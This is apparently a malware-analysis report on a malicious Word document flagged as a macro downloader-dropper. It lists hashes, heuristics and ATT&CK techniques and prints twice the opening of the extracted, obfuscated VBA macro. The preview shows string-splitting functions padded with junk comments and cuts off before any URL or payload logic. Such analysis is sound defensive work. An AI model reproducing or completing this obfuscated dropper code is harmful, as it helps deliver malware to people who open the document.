Office (OLE) malware analysis — malicious · 60aca23d2a194947

MALICIOUS

Office (OLE)

163.0 KB Created: 2016-09-05 22:43:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: f7559b3124a726c756091fc08f3b5ff7 SHA-1: ce86ea6d8abf99f3d63efd2240fc57ac44c59bb3 SHA-256: 60aca23d2a1949472ca6234f67e3bdd0ab31cb7cf309c8f62a6f43604668b909

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The presence of CreateObject calls and the ClamAV detection as a 'Doc.Dropper.Downloader' strongly suggest the macro's purpose is to download and execute a secondary payload. The macro code itself is heavily obfuscated, making it difficult to determine the exact download URL or execution method, but the overall pattern points to a downloader dropper.

Heuristics 7

ClamAV: Doc.Dropper.Downloader-6398287-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Downloader-6398287-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 40151 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	40151 bytes
SHA-256: `2ff54dbff96fe83306248c2f1042b5d224b67234f067d0b279e4d3fd5e4bea76`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function ugsyrips() Dim womfacm womfacm = "am" ugsyrips = womfacm End Function Function admefok() Dim vucxelidf vucxelidf = "s." admefok = vucxelidf 'curt appropriating seemlier household girdling named quarters End Function Function dgowzarij() Dim purfiflugz purfiflugz = "er" dgowzarij = purfiflugz End Function Function ssefof() Dim abnowhorgo abnowhorgo = ", " 'suggestiveness crafty arising fatuity verified drove twinkling unforced contriving ssefof = abnowhorgo End Function Function yxsolda() Dim bozafo bozafo = " A" 'remaking babysit minestrone colloquium giro meltdown botch judgement acuteness yxsolda = bozafo End Function Function ophybe() Dim iczegqyt iczegqyt = " =" ophybe = iczegqyt End Function Function emwalo() Dim upypkat 'plated jealousy trueblue fetus retyped jeopardising pails upypkat = "ne" emwalo = upypkat End Function Function cluzworly() Dim awexom awexom = "dr" 'circling joiner martinet weight inadvertent unmerited frisks cluzworly = awexom End Function Function ixusgemta() Dim olcodcyv olcodcyv = "= " 'duel tepid tweaking snapshot leaped beans underwater tufts devoid ixusgemta = olcodcyv End Function Function ufagucq() Dim rulerh rulerh = "re" ufagucq = rulerh End Function 'pamphleteer deposing thirst vesicles gobbet analogise Function asimnulli() Dim lemafru lemafru = "se" asimnulli = lemafru End Function Function yqiwo() Dim jereba jereba = "Ob" 'player dandy breakfasted bygones spec comical waitresses reverential double yqiwo = jereba End Function Function adyqoho() Dim ilefuz ilefuz = "in" adyqoho = ilefuz End Function Function xzicak() Dim ocyrdec 'consummately hips scatter monarchical snorting ocyrdec = "ec" xzicak = ocyrdec End Function Function alugci() Dim xtybomma xtybomma = "t " alugci = xtybomma End Function 'waded directorate washboard scuff teasingly headmasters molestations bust Function iropeh() Dim orhutihme orhutihme = ".8" iropeh = orhutihme End Function Function odselbefw() Dim onoba 'secessionist disinfected homologous visualise placating thunderstorm grown onoba = "0)" odselbefw = onoba End Function Function izvowkyzi() Dim azimac azimac = "//" 'pictorial insulin rivets heaters defences showman caprice plodding izvowkyzi = azimac End Function Function pilqutaws() Dim dysrykiqh dysrykiqh = "iv" pilqutaws = dysrykiqh 'suffocates antiquities riffled nuttier portcullis bustles reasonable mourner passionless End Function Function afygsoxr() Dim ysixose ysixose = "()" afygsoxr = ysixose End Function 'voucher depleting protectorates navigator poundage basketball annulled Function ecyxu() Dim tbyscosis tbyscosis = "md" ecyxu = tbyscosis End Function Function gyfwok() Dim juqkiq juqkiq = ";v" gyfwok = juqkiq 'jurisprudential vacillate boater fillets soggy conduct End Function Function thujesub() Dim duhebxe duhebxe = "tr" thujesub = duhebxe End Function Function wcimopl() Dim situnc 'escapade gloat bags disjunct silliest chortling untidiness situnc = "th" wcimopl = situnc End Function Function ajrusrerra() Dim daqjubkow daqjubkow = "t " ajrusrerra = daqjubkow End Function 'own gavel girder maids repossessions Function ofpyzhe() Dim bzocyna bzocyna = "pN" ofpyzhe = bzocyna End Function Function nnetoqs() Dim vzoqvuzfesk vzoqvuzfesk = ".P" 'predating straighter flute conciliatory royally nnetoqs = vzoqvuzfesk End Function Function uvettuw() Dim irmiwego irmiwego = "je" uvettuw = irmiwego End Function Function tqesnyqq() 'ammeter omelettes caricature lur postmortems tempter offering cheroot aimer Dim acpona acpona = "yp" tqesnyqq = acpona End Function Function axqinpu() Dim akpibo akpibo = "am" axqinpu = akpibo 'constrict plungers epilogue peram ... (truncated)

SHA-256: 2ff54dbff96fe83306248c2f1042b5d224b67234f067d0b279e4d3fd5e4bea76

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ugsyrips()
Dim womfacm
womfacm = "am"
ugsyrips = womfacm
End Function
Function admefok()
Dim vucxelidf
vucxelidf = "s."
admefok = vucxelidf
'curt appropriating seemlier household girdling named quarters
End Function
Function dgowzarij()
Dim purfiflugz
purfiflugz = "er"
dgowzarij = purfiflugz
End Function
Function ssefof()
Dim abnowhorgo
abnowhorgo = ", "
'suggestiveness crafty arising fatuity verified drove twinkling unforced contriving
ssefof = abnowhorgo
End Function
Function yxsolda()
Dim bozafo
bozafo = " A"
'remaking babysit minestrone colloquium giro meltdown botch judgement acuteness
yxsolda = bozafo
End Function
Function ophybe()
Dim iczegqyt
iczegqyt = " ="
ophybe = iczegqyt
End Function
Function emwalo()
Dim upypkat
'plated jealousy trueblue fetus retyped jeopardising pails
upypkat = "ne"
emwalo = upypkat
End Function
Function cluzworly()
Dim awexom
awexom = "dr"
'circling joiner martinet weight inadvertent unmerited frisks
cluzworly = awexom
End Function
Function ixusgemta()
Dim olcodcyv
olcodcyv = "= "
'duel tepid tweaking snapshot leaped beans underwater tufts devoid
ixusgemta = olcodcyv
End Function
Function ufagucq()
Dim rulerh
rulerh = "re"
ufagucq = rulerh
End Function
'pamphleteer deposing thirst vesicles gobbet analogise
Function asimnulli()
Dim lemafru
lemafru = "se"
asimnulli = lemafru
End Function
Function yqiwo()
Dim jereba
jereba = "Ob"
'player dandy breakfasted bygones spec comical waitresses reverential double
yqiwo = jereba
End Function
Function adyqoho()
Dim ilefuz
ilefuz = "in"
adyqoho = ilefuz
End Function
Function xzicak()
Dim ocyrdec
'consummately hips scatter monarchical snorting
ocyrdec = "ec"
xzicak = ocyrdec
End Function
Function alugci()
Dim xtybomma
xtybomma = "t "
alugci = xtybomma
End Function
'waded directorate washboard scuff teasingly headmasters molestations bust
Function iropeh()
Dim orhutihme
orhutihme = ".8"
iropeh = orhutihme
End Function
Function odselbefw()
Dim onoba
'secessionist disinfected homologous visualise placating thunderstorm grown
onoba = "0)"
odselbefw = onoba
End Function
Function izvowkyzi()
Dim azimac
azimac = "//"
'pictorial insulin rivets heaters defences showman caprice plodding
izvowkyzi = azimac
End Function
Function pilqutaws()
Dim dysrykiqh
dysrykiqh = "iv"
pilqutaws = dysrykiqh
'suffocates antiquities riffled nuttier portcullis bustles reasonable mourner passionless
End Function
Function afygsoxr()
Dim ysixose
ysixose = "()"
afygsoxr = ysixose
End Function
'voucher depleting protectorates navigator poundage basketball annulled
Function ecyxu()
Dim tbyscosis
tbyscosis = "md"
ecyxu = tbyscosis
End Function
Function gyfwok()
Dim juqkiq
juqkiq = ";v"
gyfwok = juqkiq
'jurisprudential vacillate boater fillets soggy conduct
End Function
Function thujesub()
Dim duhebxe
duhebxe = "tr"
thujesub = duhebxe
End Function
Function wcimopl()
Dim situnc
'escapade gloat bags disjunct silliest chortling untidiness
situnc = "th"
wcimopl = situnc
End Function
Function ajrusrerra()
Dim daqjubkow
daqjubkow = "t "
ajrusrerra = daqjubkow
End Function
'own gavel girder maids repossessions
Function ofpyzhe()
Dim bzocyna
bzocyna = "pN"
ofpyzhe = bzocyna
End Function
Function nnetoqs()
Dim vzoqvuzfesk
vzoqvuzfesk = ".P"
'predating straighter flute conciliatory royally
nnetoqs = vzoqvuzfesk
End Function
Function uvettuw()
Dim irmiwego
irmiwego = "je"
uvettuw = irmiwego
End Function
Function tqesnyqq()
'ammeter omelettes caricature lur postmortems tempter offering cheroot aimer
Dim acpona
acpona = "yp"
tqesnyqq = acpona
End Function
Function axqinpu()
Dim akpibo
akpibo = "am"
axqinpu = akpibo
'constrict plungers epilogue peram
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.